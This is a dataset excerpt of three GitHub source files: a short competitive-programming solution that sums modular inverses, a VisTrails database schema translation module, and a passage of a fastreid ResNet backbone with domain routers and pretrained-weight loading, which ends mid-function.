seq_id (string, 7-11 chars) | text (string, 156-1.7M chars) | repo_name (string, 7-125 chars) | sub_path (string, 4-132 chars) | file_name (string, 4-77 chars) | file_ext (string, 6 classes) | file_size_in_byte (int64, 156-1.7M) | program_lang (string, 1 class) | lang (string, 38 classes) | doc_type (string, 1 class) | stars (int64, 0-24.2k, nullable) | dataset (string, 1 class) | pt (string, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|---|---
38453844732
|
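# Accumulate s * n^{-1} mod 1e9+7 over m queries, using pow(n, -1, p) for the modular inverse (Python 3.8+).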
import sys
input = sys.stdin.readline
m = int(input())
x = int(1e9)+7
q = 0
for _ in range(m):
n,s = map(int,input().split())
nInv = pow(n,-1,x)
q = (q + (s*nInv)) % x
print(q)
|
LightPotato99/baekjoon
|
math/modInverse/sigma.py
|
sigma.py
|
py
| 190 |
python
|
en
|
code
| 0 |
github-code
|
6
|
858041514
|
from __future__ import division
import copy
from vistrails.db.versions.v1_0_1.domain import DBVistrail, DBWorkflow, DBLog, \
DBRegistry, DBGroup, DBTag, DBAnnotation, DBAction, IdScope
def translateVistrail(_vistrail):
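# Collect per-action annotations (__tag__, __notes__, __thumb__, __upgrade__, __prune__) so they can be
# re-emitted as native fields of the 1.0.1 schema during translation.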
tag_annotations = {}
notes_annotations = {}
thumb_annotations = {}
upgrade_annotations = {}
prune_annotations = {}
del_tag_annotations = {}
del_notes_annotations = {}
del_thumb_annotations = {}
del_upgrade_annotations = {}
del_prune_annotations = {}
key_lists = {'__tag__': tag_annotations,
'__notes__': notes_annotations,
'__thumb__': thumb_annotations,
'__upgrade__': upgrade_annotations,
'__prune__': prune_annotations}
del_key_lists = {'__tag__': del_tag_annotations,
'__notes__': del_notes_annotations,
'__thumb__': del_thumb_annotations,
'__upgrade__': del_upgrade_annotations,
'__prune__': del_prune_annotations}
_vistrail.update_id_scope()
id_scope = _vistrail.idScope
def update_tags(old_obj, translate_dict):
new_tags = []
for (id, (_, tag, is_new, is_dirty)) in tag_annotations.iteritems():
new_tag = DBTag(id=id, name=tag)
new_tag.is_new = is_new
new_tag.is_dirty = is_dirty
new_tags.append(new_tag)
return new_tags
def update_prune(old_obj, translate_dict):
if old_obj.db_id in prune_annotations:
(_, prune_val, _, _) = prune_annotations[old_obj.db_id]
if prune_val == str(True):
return 1
elif prune_val == str(False):
return 0
return None
def update_annotations(old_obj, translate_dict):
new_annotations = [DBAnnotation.update_version(a, translate_dict)
for a in old_obj.db_annotations]
if old_obj.db_id in notes_annotations:
(id, notes, is_new, is_dirty) = notes_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__notes__',
value=notes)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
if old_obj.db_id in upgrade_annotations:
(id, upgrade, is_new, is_dirty) = \
upgrade_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__upgrade__',
value=upgrade)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
if old_obj.db_id in thumb_annotations:
(id, thumb, is_new, is_dirty) = thumb_annotations[old_obj.db_id]
ann = DBAnnotation(id=id,
key='__thumb__',
value=thumb)
ann.is_new = is_new
ann.is_dirty = is_dirty
new_annotations.append(ann)
return new_annotations
def update_actions(old_obj, translate_dict):
new_actions = []
for action in old_obj.db_actions:
if action.db_id in del_notes_annotations:
(id, notes, is_new, is_dirty) = \
del_notes_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__notes__',
value=notes)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
if action.db_id in del_upgrade_annotations:
(id, upgrade, is_new, is_dirty) = \
del_upgrade_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__upgrade__',
value=upgrade)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
if action.db_id in del_thumb_annotations:
(id, thumb, is_new, is_dirty) = \
del_thumb_annotations[action.db_id]
ann = DBAnnotation(id=id,
key='__thumb__',
value=thumb)
ann.is_new = is_new
ann.is_dirty = is_dirty
action.db_deleted_annotations.append(ann)
new_actions.append(DBAction.update_version(action, translate_dict))
return new_actions
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
for a in _vistrail.db_actionAnnotations:
if a.db_key in key_lists:
key_lists[a.db_key][a.db_action_id] = \
(a.db_id, a.db_value, a.is_new, a.is_dirty)
for a in _vistrail.db_deleted_actionAnnotations:
if a.db_key in del_key_lists:
del_key_lists[a.db_key][a.db_action_id] = \
(a.db_id, a.db_value, a.is_new, a.is_dirty)
translate_dict = {'DBGroup': {'workflow': update_workflow},
'DBVistrail': {'tags': update_tags,
'actions': update_actions},
'DBAction': {'annotations': update_annotations,
'prune': update_prune}}
vistrail = DBVistrail.update_version(_vistrail, translate_dict)
for (id, (_, tag, is_new, is_dirty)) in del_tag_annotations.iteritems():
new_tag = DBTag(id=id, name=tag)
new_tag.is_new = is_new
new_tag.is_dirty = is_dirty
vistrail.db_deleted_tags.append(new_tag)
vistrail.db_version = '1.0.1'
return vistrail
def translateWorkflow(_workflow):
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
translate_dict = {'DBGroup': {'workflow': update_workflow}}
workflow = DBWorkflow.update_version(_workflow, translate_dict)
workflow.db_version = '1.0.1'
return workflow
def translateLog(_log):
translate_dict = {}
log = DBLog.update_version(_log, translate_dict)
log.db_version = '1.0.1'
return log
def translateRegistry(_registry):
translate_dict = {}
registry = DBRegistry.update_version(_registry, translate_dict)
registry.db_version = '1.0.1'
return registry
|
VisTrails/VisTrails
|
vistrails/db/versions/v1_0_1/translate/v1_0_2.py
|
v1_0_2.py
|
py
| 6,533 |
python
|
en
|
code
| 100 |
github-code
|
6
|
457427877
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
import logging
import math
from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from torch.autograd.variable import Variable
from fastreid.modeling.ops import MetaConv2d, MetaLinear, MetaBNNorm, MetaINNorm, MetaIBNNorm, MetaGate
from fastreid.layers import (
IBN,
SELayer,
Non_local,
get_norm,
)
from fastreid.utils.checkpoint import get_missing_parameters_message, get_unexpected_parameters_message
from .build import BACKBONE_REGISTRY
from fastreid.utils import comm
K = 4
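# K: number of grouped domain-specific branches mixed by HyperRouter (see Bottleneck2 and ResNet.forward).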
logger = logging.getLogger(__name__)
model_urls = {
'18x': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'34x': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'50x': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'101x': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'ibn_18x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet18_ibn_a-2f571257.pth',
'ibn_34x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet34_ibn_a-94bc1577.pth',
'ibn_50x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet50_ibn_a-d9d0bb7b.pth',
'ibn_101x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/resnet101_ibn_a-59ea0ac6.pth',
'se_ibn_101x': 'https://github.com/XingangPan/IBN-Net/releases/download/v1.0/se_resnet101_ibn_a-fabed4e2.pth',
}
def repackage_hidden(h):
if type(h) == Variable:
return Variable(h.data)
else:
return tuple(repackage_hidden(v) for v in h)
class Sequential_ext(nn.Module):
"""A Sequential container extended to also propagate the gating information
that is needed in the target rate loss.
"""
def __init__(self, *args):
super(Sequential_ext, self).__init__()
if len(args) == 1 and isinstance(args[0], OrderedDict):
for key, module in args[0].items():
self.add_module(key, module)
else:
for idx, module in enumerate(args):
self.add_module(str(idx), module)
def __getitem__(self, idx):
if not (-len(self) <= idx < len(self)):
raise IndexError('index {} is out of range'.format(idx))
if idx < 0:
idx += len(self)
it = iter(self._modules.values())
for i in range(idx):
next(it)
return next(it)
def __len__(self):
return len(self._modules)
def forward(self, input, opt=None):
for i, module in enumerate(self._modules.values()):
input = module(input, opt)
return input
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
if with_ibn:
self.bn1 = IBN(planes, bn_norm)
else:
self.bn1 = get_norm(bn_norm, planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = get_norm(bn_norm, planes)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.se(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class MetaSELayer(nn.Module):
def __init__(self, channel, reduction=16):
super(MetaSELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = MetaLinear(channel, int(channel / reduction), bias=False)
self.relu = nn.ReLU()
self.fc2 = MetaLinear(int(channel / reduction), channel, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x, opt=None):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.relu(self.fc1(y, opt))
y = self.sigmoid(self.fc2(y, opt)).view(b, c, 1, 1)
return x * y.expand_as(x)
class Bottleneck2(nn.Module):
expansion = 4*K
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(Bottleneck2, self).__init__()
self.conv1 = MetaConv2d(inplanes * K, planes, kernel_size=1, bias=False, groups=K)
if with_ibn:
self.bn1 = MetaIBNNorm(planes)
else:
self.bn1 = MetaBNNorm(planes)
self.conv2 = MetaConv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False, groups=K)
self.bn2 = MetaBNNorm(planes)
self.conv3 = MetaConv2d(planes, planes * self.expansion, kernel_size=1, bias=False, groups=K)
self.bn3 = MetaBNNorm(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes * self.expansion, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x, opt=None):
residual = x
out = self.conv1(x, opt)
out = self.bn1(out, opt)
out = self.relu(out)
out = self.conv2(out, opt)
out = self.bn2(out, opt)
out = self.relu(out)
out = self.conv3(out, opt)
out = self.bn3(out, opt)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x, opt)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, bn_norm, with_ibn=False, with_se=False,
stride=1, downsample=None, reduction=16):
super(Bottleneck, self).__init__()
if bn_norm == 'IN':
norm = MetaINNorm
else:
norm = MetaBNNorm
self.conv1 = MetaConv2d(inplanes, planes, kernel_size=1, bias=False)
if with_ibn:
self.bn1 = MetaIBNNorm(planes)
else:
self.bn1 = norm(planes)
self.conv2 = MetaConv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = norm(planes)
self.conv3 = MetaConv2d(planes, planes * self.expansion, kernel_size=1, bias=False)
self.bn3 = norm(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
if with_se:
self.se = SELayer(planes * self.expansion, reduction)
else:
self.se = nn.Identity()
self.downsample = downsample
self.stride = stride
def forward(self, x, opt=None):
residual = x
out = self.conv1(x, opt)
out = self.bn1(out, opt)
out = self.relu(out)
out = self.conv2(out, opt)
out = self.bn2(out, opt)
out = self.relu(out)
out = self.conv3(out, opt)
out = self.bn3(out, opt)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x, opt)
out += residual
out = self.relu(out)
return out
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x, None
class HyperRouter(nn.Module):
def __init__(self, planes):
super().__init__()
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.planes = planes
self.fc1 = MetaLinear(planes, planes//16)
self.fc2 = MetaLinear(planes//16, planes*K)
self.fc_classifier = MetaLinear(planes*K, 3)
self.relu = nn.ReLU()
self.softmax = nn.Softmax(-1)
def forward(self, x, opt=None):
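# Pool to a (B, planes) vector, predict per-channel weights for the K branches and a 3-way domain logit,
# and return softmax-normalized mixing weights over K.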
x = self.avgpool(x).squeeze(-1).squeeze(-1)
weight = self.relu(F.normalize(self.fc1(x, opt), 2, -1))
weight = self.fc2(weight, opt).reshape(-1, self.planes, K)
domain_cls_logits = self.fc_classifier(weight.reshape(-1, self.planes*K), opt)
x = self.softmax(torch.einsum('bi,bil->bl', x, weight))
return x, domain_cls_logits
class ResNet(nn.Module):
def __init__(self, last_stride, bn_norm, with_ibn, with_se, with_nl, block, layers, non_layers):
self.inplanes = 64
super().__init__()
self.conv1 = MetaConv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = MetaBNNorm(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True)
self.layer1 = self._make_layer(block, 64, layers[0]-1, 1, bn_norm, with_ibn, with_se)
self.adaptor1_base = block(256, 64, 'IN', False, with_se)
self.adaptor1_sub = Bottleneck2(256, 64, bn_norm, with_ibn, with_se)
self.router1 = HyperRouter(256)
self.invariant_norm1 = MetaBNNorm(256)
self.specific_norm1 = MetaBNNorm(256)
self.meta_fuse1 = MetaGate(256)
self.meta_se1 = MetaSELayer(256)
self.map1 = MetaBNNorm(256, bias_freeze=True)
self.layer2 = self._make_layer(block, 128, layers[1]-1, 2, bn_norm, with_ibn, with_se)
self.adaptor2_base = block(512, 128, 'IN', False, with_se)
self.adaptor2_sub = Bottleneck2(512, 128, bn_norm, with_ibn, with_se)
self.router2 = HyperRouter(512)
self.invariant_norm2 = MetaBNNorm(512)
self.specific_norm2 = MetaBNNorm(512)
self.meta_fuse2 = MetaGate(512)
self.meta_se2 = MetaSELayer(512)
self.map2 = MetaBNNorm(512, bias_freeze=True)
self.layer3 = self._make_layer(block, 256, layers[2]-1, 2, bn_norm, with_ibn, with_se)
self.adaptor3_base = block(1024, 256, 'IN', False, with_se)
self.adaptor3_sub = Bottleneck2(1024, 256, bn_norm, with_ibn, with_se)
self.router3 = HyperRouter(1024)
self.invariant_norm3 = MetaBNNorm(1024)
self.specific_norm3 = MetaBNNorm(1024)
self.meta_fuse3 = MetaGate(1024)
self.meta_se3 = MetaSELayer(1024)
self.map3 = MetaBNNorm(1024, bias_freeze=True)
self.layer4 = self._make_layer(block, 512, layers[3]-1, last_stride, bn_norm, with_se=with_se)
self.adaptor4_base = block(2048, 512, 'IN', False, with_se)
self.adaptor4_sub = Bottleneck2(2048, 512, bn_norm, with_ibn, with_se)
self.router4 = HyperRouter(2048)
self.invariant_norm4 = MetaBNNorm(2048)
self.specific_norm4 = MetaBNNorm(2048)
self.meta_fuse4 = MetaGate(2048)
self.meta_se4 = MetaSELayer(2048)
self.map4 = MetaBNNorm(2048, bias_freeze=True)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# Standard Params
self.softmax = nn.Softmax(1)
self.sigmoid = nn.Sigmoid()
self.relu = nn.ReLU()
self.random_init()
# fmt: off
if with_nl: self._build_nonlocal(layers, non_layers, bn_norm)
else: self.NL_1_idx = self.NL_2_idx = self.NL_3_idx = self.NL_4_idx = []
# fmt: on
def _make_layer(self, block, planes, blocks, stride=1, bn_norm="BN", with_ibn=False, with_se=False):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = Sequential_ext(
MetaConv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
MetaBNNorm(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, bn_norm, with_ibn, with_se, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, bn_norm, with_ibn, with_se))
return nn.Sequential(*layers)
def _build_nonlocal(self, layers, non_layers, bn_norm):
self.NL_1 = nn.ModuleList(
[Non_local(256, bn_norm) for _ in range(non_layers[0])])
self.NL_1_idx = sorted([layers[0] - (i + 1) for i in range(non_layers[0])])
self.NL_2 = nn.ModuleList(
[Non_local(512, bn_norm) for _ in range(non_layers[1])])
self.NL_2_idx = sorted([layers[1] - (i + 1) for i in range(non_layers[1])])
self.NL_3 = nn.ModuleList(
[Non_local(1024, bn_norm) for _ in range(non_layers[2])])
self.NL_3_idx = sorted([layers[2] - (i + 1) for i in range(non_layers[2])])
self.NL_4 = nn.ModuleList(
[Non_local(2048, bn_norm) for _ in range(non_layers[3])])
self.NL_4_idx = sorted([layers[3] - (i + 1) for i in range(non_layers[3])])
def get_all_conv_layers(self, module):
for m in module:
if isinstance(m, Bottleneck):
for _m in m.modules():
if isinstance(_m, nn.Conv2d):
yield _m
def forward(self, x, epoch, opt=None):
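# Per stage: backbone blocks (plus optional non-local), then a domain-invariant adaptor and K grouped
# domain-specific adaptors mixed by the router weights, fused with MetaGate and MetaSELayer;
# an L2-normalized pooled feature is collected from every stage.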
x = self.conv1(x, opt)
x = self.bn1(x, opt)
x = self.relu(x)
x = self.maxpool(x)
weights = []
out_features = []
# layer 1
NL1_counter = 0
if len(self.NL_1_idx) == 0:
self.NL_1_idx = [-1]
for i in range(len(self.layer1)):
x = self.layer1[i](x, opt)
if i == self.NL_1_idx[NL1_counter]:
_, C, H, W = x.shape
x = self.NL_1[NL1_counter](x)
NL1_counter += 1
x_invariant = self.adaptor1_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor1_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router1(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm1(x_invariant, opt)
x_specific = self.specific_norm1(x_specific, opt)
x = self.meta_fuse1(x_invariant, x_specific, opt)
x = self.meta_se1(x, opt)
temp = self.map1(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 2
NL2_counter = 0
if len(self.NL_2_idx) == 0:
self.NL_2_idx = [-1]
for i in range(len(self.layer2)):
x = self.layer2[i](x, opt)
if i == self.NL_2_idx[NL2_counter]:
_, C, H, W = x.shape
x = self.NL_2[NL2_counter](x)
NL2_counter += 1
x_invariant = self.adaptor2_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor2_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router2(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm2(x_invariant, opt)
x_specific = self.specific_norm2(x_specific, opt)
x = self.meta_fuse2(x_invariant, x_specific, opt)
x = self.meta_se2(x, opt)
temp = self.map2(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 3
NL3_counter = 0
if len(self.NL_3_idx) == 0:
self.NL_3_idx = [-1]
for i in range(len(self.layer3)):
x = self.layer3[i](x, opt)
if i == self.NL_3_idx[NL3_counter]:
_, C, H, W = x.shape
x = self.NL_3[NL3_counter](x)
NL3_counter += 1
x_invariant = self.adaptor3_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor3_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router3(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm3(x_invariant, opt)
x_specific = self.specific_norm3(x_specific, opt)
x = self.meta_fuse3(x_invariant, x_specific, opt)
x = self.meta_se3(x, opt)
temp = self.map3(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
# layer 4
NL4_counter = 0
if len(self.NL_4_idx) == 0:
self.NL_4_idx = [-1]
for i in range(len(self.layer4)):
x = self.layer4[i](x, opt)
if i == self.NL_4_idx[NL4_counter]:
_, C, H, W = x.shape
x = self.NL_4[NL4_counter](x)
NL4_counter += 1
x_invariant = self.adaptor4_base(x, opt)
N, C, H, W = x_invariant.shape
x_specific = self.adaptor4_sub(x.repeat(1, K, 1, 1), opt).reshape(N, K, C, H, W)
weight, domain_cls_logit = self.router4(x, opt)
weights.append(weight)
x_specific = (x_specific * weight.reshape(-1, K, 1, 1, 1)).sum(1)
x_invariant = self.invariant_norm4(x_invariant, opt)
x_specific = self.specific_norm4(x_specific, opt)
x = self.meta_fuse4(x_invariant, x_specific, opt)
x = self.meta_se4(x, opt)
temp = self.map4(self.avgpool(x), opt)
out_features.append(F.normalize(temp, 2, 1)[..., 0, 0])
weights = torch.cat(weights, -1)
return x, weights, out_features
def random_init(self):
for name, m in self.named_modules():
if isinstance(m, MetaConv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
nn.init.normal_(m.weight, 0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def init_pretrained_weights(key):
"""Initializes model with pretrained weights.
Layers that don't match with pretrained layers in name or size are kept unchanged.
"""
import os
import errno
import gdown
def _get_torch_home():
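# Resolve the torch cache directory: $TORCH_HOME, else $XDG_CACHE_HOME/torch, else ~/.cache/torch.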
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
torch_home = os.path.expanduser(
os.getenv(
ENV_TORCH_HOME,
os.path.join(
os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch'
)
)
)
return torch_home
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
filename = model_urls[key].split('/')[-1]
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
logger.info(f"Pretrain model don't exist, downloading from {model_urls[key]}")
if comm.is_main_process():
gdown.download(model_urls[key], cached_file, quiet=False)
comm.synchronize()
logger.info(f"Loading pretrained model from {cached_file}")
state_dict = torch.load(cached_file, map_location=torch.device('cpu'))
# CHANGE Reduction Version: the original code overwrote the downloaded weights with a hard-coded local
# path; the generic cached_file load above is kept so this works on any machine.
# state_dict = torch.load('/home/pengyi/.cache/torch/checkpoints/resnet50_ibn_a-d9d0bb7b.pth', map_location=torch.device('cpu'))
return state_dict
@BACKBONE_REGISTRY.register()
def build_meta_dynamic_router_resnet_backbone(cfg):
"""
Create a ResNet instance from config.
Returns:
ResNet: a :class:`ResNet` instance.
"""
# fmt: off
pretrain = cfg.MODEL.BACKBONE.PRETRAIN
pretrain_path = cfg.MODEL.BACKBONE.PRETRAIN_PATH
last_stride = cfg.MODEL.BACKBONE.LAST_STRIDE
bn_norm = cfg.MODEL.BACKBONE.NORM
with_ibn = cfg.MODEL.BACKBONE.WITH_IBN
with_se = cfg.MODEL.BACKBONE.WITH_SE
with_nl = cfg.MODEL.BACKBONE.WITH_NL
depth = cfg.MODEL.BACKBONE.DEPTH
# fmt: on
num_blocks_per_stage = {
'18x': [2, 2, 2, 2],
'34x': [3, 4, 6, 3],
'50x': [3, 4, 6, 3],
'101x': [3, 4, 23, 3],
}[depth]
nl_layers_per_stage = {
'18x': [0, 0, 0, 0],
'34x': [0, 0, 0, 0],
'50x': [0, 2, 3, 0],
'101x': [0, 2, 9, 0]
}[depth]
block = {
'18x': BasicBlock,
'34x': BasicBlock,
'50x': Bottleneck,
'101x': Bottleneck
}[depth]
model = ResNet(last_stride, bn_norm, with_ibn, with_se, with_nl, block,
num_blocks_per_stage, nl_layers_per_stage)
if pretrain:
# Load weights from pretrain_path if one is explicitly specified
if pretrain_path:
try:
state_dict = torch.load(pretrain_path, map_location=torch.device('cpu'))
logger.info(f"Loading pretrained model from {pretrain_path}")
except FileNotFoundError as e:
logger.info(f'{pretrain_path} is not found! Please check this path.')
raise e
except KeyError as e:
logger.info("State dict keys error! Please check the state dict.")
raise e
else:
key = depth
if with_ibn: key = 'ibn_' + key
# if with_se: key = 'se_' + key
state_dict = init_pretrained_weights(key)
model_dict = model.state_dict()
for k in model_dict.keys():
if k in state_dict:
v = state_dict[k]
if model_dict[k].shape == v.shape:
model_dict[k] = v
else:
if len(v.shape) == 1:
model_dict[k] = v[:model_dict[k].shape[0]]
elif len(v.shape) == 2:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1]]
elif len(v.shape) == 3:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2]]
elif len(v.shape) == 4:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2], :model_dict[k].shape[3]]
elif len(v.shape) == 5:
model_dict[k] = v[:model_dict[k].shape[0], :model_dict[k].shape[1], :model_dict[k].shape[2], :model_dict[k].shape[3], :model_dict[k].shape[4]]
else:
raise Exception
else:
try:
if 'adaptor1_base' in k:
if model_dict[k].shape == state_dict['layer1.2'+k[13:]].shape:
model_dict[k] = state_dict['layer1.2'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor1_sub' in k:
if 'conv3' in k:
v = state_dict['layer1.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer1.2'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer1.2'+k[12:]].shape:
model_dict[k] = state_dict['layer1.2'+k[12:]]
else:
v = state_dict['layer1.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor2_base' in k:
if model_dict[k].shape == state_dict['layer2.3'+k[13:]].shape:
model_dict[k] = state_dict['layer2.3'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor2_sub' in k:
if 'conv3' in k:
v = state_dict['layer2.3'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer2.3'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer2.3'+k[12:]].shape:
model_dict[k] = state_dict['layer2.3'+k[12:]]
else:
v = state_dict['layer2.3'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor3_base' in k:
if model_dict[k].shape == state_dict['layer3.5'+k[13:]].shape:
model_dict[k] = state_dict['layer3.5'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor3_sub' in k:
if 'conv3' in k:
v = state_dict['layer3.5'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer3.5'+k[12:]]
model_dict[k] = v.repeat(K)
elif model_dict[k].shape == state_dict['layer3.5'+k[12:]].shape:
model_dict[k] = state_dict['layer3.5'+k[12:]]
else:
v = state_dict['layer3.5'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
print('Done, adaptor', k)
elif 'adaptor4_base' in k:
if model_dict[k].shape == state_dict['layer4.2'+k[13:]].shape:
model_dict[k] = state_dict['layer4.2'+k[13:]]
print('Done, adaptor', k)
else:
print('Skip, adaptor', k)
elif 'adaptor4_sub' in k:
if 'conv3' in k:
v = state_dict['layer4.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2).repeat(K, 1, 1, 1)
elif 'bn3' in k:
v = state_dict['layer4.2'+k[12:]]
model_dict[k] = v.repeat(K)
elif 'bn1' in k:
if 'IN' in k:
model_dict[k] = state_dict['layer4.2.bn1.'+k.split('.')[-1]][:256]
else:
model_dict[k] = state_dict['layer4.2.bn1.'+k.split('.')[-1]][256:]
elif model_dict[k].shape == state_dict['layer4.2'+k[12:]].shape:
model_dict[k] = state_dict['layer4.2'+k[12:]]
else:
v = state_dict['layer4.2'+k[12:]]
Cout, Cin, H, W = v.shape
model_dict[k] = F.avg_pool1d(v.permute(0, 2, 3, 1).reshape(Cout, H*W, Cin), kernel_size=K).reshape(Cout, H, W, -1).permute(0, 3, 1, 2)
